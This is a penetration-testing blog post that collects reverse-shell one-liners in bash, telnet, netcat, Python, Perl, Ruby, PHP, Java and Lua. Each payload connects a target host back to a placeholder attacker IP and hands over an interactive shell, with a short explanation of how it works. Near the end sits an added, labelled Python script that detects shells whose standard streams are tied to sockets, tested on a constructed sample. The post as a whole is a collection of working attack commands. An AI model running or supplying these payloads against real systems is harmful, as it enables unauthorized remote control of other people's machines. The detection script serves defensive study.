N ways to bounce a shell (reverse shell)
2022-07-28 06:18:00 【cainsoftware】
0x00 Preface
During a penetration test, once a webshell has been obtained, the next step depends on the target: if it is a Windows host, we usually connect remotely over port 3389 (RDP); if it is a Linux server, we generally bounce a shell back to ourselves. This post summarizes several common reverse shell techniques.
0x01 Bash reverse shell
1.1 Method 1
The attacker listens on their own host:

nc -lvvp port

Execute on the target host:

bash -i >& /dev/tcp/x.x.x.x/port 0>&1

# bash -i                open an interactive bash
# >&                     redirect standard output and standard error to the file that follows
# /dev/tcp/x.x.x.x/port  opening this path makes bash issue a socket call and connect to x.x.x.x (the host to bounce to) on port
# 0>&1                   make standard input read from the same socket as fd 1, so you can interact with the bounced shell

Note: /dev/tcp/ is a special path in the Linux shell (it is implemented by bash and does not exist on disk). Opening it is equivalent to a socket call that establishes a TCP connection, and reading from or writing to it is reading from or writing to that connection. Similarly, Linux shells also have /dev/udp/.

The following file descriptors are commonly used in the Linux shell:
1. Standard input (stdin): fd 0, used with < or <<
2. Standard output (stdout): fd 1, used with > or >>
3. Standard error (stderr): fd 2, used with 2> or 2>>
In addition, because of differences between Linux distributions (/dev/tcp is a bash feature, so it is unavailable when /bin/sh is dash or when bash was built without network redirections), this command may not work on some systems.
1.2 Method 2
exec 0</dev/tcp/x.x.x.x/port 1>&0 2>&0
# exec with only redirections binds the current shell's stdin to the socket and points stdout and stderr at it

0<&196; exec 196<>/dev/tcp/x.x.x.x/4444; sh <&196 >&196 2>&196
# opens the socket read/write on fd 196 and starts sh with all three standard streams on it

/bin/bash -i > /dev/tcp/x.x.x.x/8080 0<&1 2>&1

1.3 Method 3
exec 5<>/dev/tcp/x.x.x.x/4444; cat <&5 | while read line; do $line 2>&5 >&5; done
# reads one command per line from the socket and sends each command's output and errors back to it

0x02 telnet reverse shell
2.1 Method 1
Open two terminals on the attacker's host and listen on each:

nc -lvvp 4444
nc -lvvp 5555

Execute on the target host:

telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 5555

The two ports carry input and output respectively; x.x.x.x is the attacker's IP in both places.
After the reverse shell comes up, commands typed into the terminal listening on port 4444 are executed on the target and their output appears in the other terminal (port 5555).
2.2 Method 2
rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0</tmp/p | /bin/bash 1>/tmp/p
# /tmp/p is a named pipe: telnet reads from it and feeds what it receives from the attacker to bash, and bash writes its output back into the pipe for telnet to send

0x03 nc (netcat) reverse shell
The attacker listens on their host:

nc -lvvp port

Execute on the target host:

nc -e /bin/bash x.x.x.x port

If the netcat shipped with the target's Linux distribution does not support the -e option, the following forms also work:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x 9999 >/tmp/f

Note: mkfifo creates a FIFO special file, also known as a named pipe. A FIFO has no data blocks on disk; it only identifies a channel in the kernel. When each process opens the FIFO and performs read/write, it is actually reading and writing that kernel channel (the underlying reason is that the FIFO's file structure points to read/write functions that differ from a regular file's), which is what makes it usable for inter-process communication.

nc x.x.x.x 4444 | /bin/bash | nc x.x.x.x 5555
# commands are received on port 4444, run by bash, and the results are returned on port 5555; the attacker again opens two listening terminals on their host

nc -c /bin/sh x.x.x.x 4444

/bin/sh | nc x.x.x.x 4444

0x04 Reverse shells with common scripting languages
4.1 python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

4.2 perl
4.2.1 Method 1
perl -e 'use Socket;$i="x.x.x.x";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

4.2.2 Method 2
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'4.3 Ruby
4.3.1 Method 1
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

4.3.2 Method 2
ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",5555).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'4.4 PHP
php -r '$sock=fsockopen("x.x.x.x",5555);exec("/bin/bash -i <&3 >&3 2>&3");'

4.5 Java
public class Revs {
    /**
     * @param args
     * @throws Exception
     */
    public static void main(String[] args) throws Exception {
        Runtime r = Runtime.getRuntime();
        // run the bash fd-5 loop from 1.3 Method 3 through the system shell
        String cmd[] = {"/bin/bash", "-c",
            "exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

4.6 Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Note: the scripts above are executed on the target host, where x.x.x.x is the attacker's IP in every case, and the attacker must be listening on their own host:
nc -lvvp 5555
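Every method on this page ends the same way: a shell whose standard streams are tied to a socket, either directly (the /dev/tcp and dup2 forms in 0x01 and 0x04) or through pipes to an nc/telnet process (0x02, 0x03), and on Linux that is visible in the /proc/<pid>/fd symlinks. The following detection script is an added example, not code from the original post; its SAMPLE process table is constructed, and snapshot_proc() is only a helper for reading a live host.

```python
"""Flag shells whose standard streams are wired to the network, using /proc fd links (Linux)."""
import os
from collections import defaultdict

SHELLS = {"bash", "sh", "dash", "zsh", "ash"}

def find_network_shells(procs):
    """procs: {pid: {"comm": name, "fds": {fd: readlink target}}} -> sorted list of (pid, reason).
    Catches both shapes above: a shell whose fd 0/1/2 is itself a socket (/dev/tcp, dup2 forms)
    and one whose std fd is a pipe shared with a socket-holding process (nc/telnet/mkfifo chains)."""
    pipe_holders = defaultdict(set)  # "pipe:[inode]" -> pids that hold that pipe
    has_socket = {}                  # pid -> True if any of its fds is a socket
    for pid, info in procs.items():
        has_socket[pid] = any(t.startswith("socket:") for t in info["fds"].values())
        for t in (t for t in info["fds"].values() if t.startswith("pipe:")):
            pipe_holders[t].add(pid)
    findings = []
    for pid, info in procs.items():
        if info["comm"] not in SHELLS:
            continue
        std = [info["fds"].get(n, "") for n in (0, 1, 2)]
        if any(t.startswith("socket:") for t in std):
            findings.append((pid, "std fd is a socket"))
            continue
        peers = {p for t in std if t.startswith("pipe:") for p in pipe_holders[t] if p != pid}
        if any(has_socket[p] for p in peers):
            findings.append((pid, "std fd piped to a socket-holding process"))
    return sorted(findings)

def snapshot_proc():
    """Read the live /proc table into the structure above (Linux only; pids we cannot read are skipped)."""
    procs = {}
    for entry in filter(str.isdigit, os.listdir("/proc")):
        try:
            comm = open(f"/proc/{entry}/comm").read().strip()
            fds = {int(n): os.readlink(f"/proc/{entry}/fd/{n}") for n in os.listdir(f"/proc/{entry}/fd")}
        except OSError:
            continue
        procs[int(entry)] = {"comm": comm, "fds": fds}
    return procs

# Constructed sample, not a real capture: a normal terminal shell (1500), a /dev/tcp shell (2001)
# and a `cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x 9999 >/tmp/f` chain (2010-2012).
SAMPLE = {
    1500: {"comm": "bash", "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    2001: {"comm": "bash", "fds": {0: "socket:[41001]", 1: "socket:[41001]", 2: "socket:[41001]"}},
    2010: {"comm": "cat", "fds": {0: "/tmp/f", 1: "pipe:[50001]"}},
    2011: {"comm": "bash", "fds": {0: "pipe:[50001]", 1: "pipe:[50002]", 2: "pipe:[50002]"}},
    2012: {"comm": "nc", "fds": {0: "pipe:[50002]", 1: "/tmp/f", 3: "socket:[41002]"}},
}
```

On a live Linux host, `find_network_shells(snapshot_proc())` runs the same check over the real process table; the normal terminal shell in the sample is not reported because its streams point at a pty, not a socket or a pipe to one.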
0x05 summary
The methods above are the common ways of bouncing a shell; there are certainly others, and additions are welcome. This post will also be updated over time.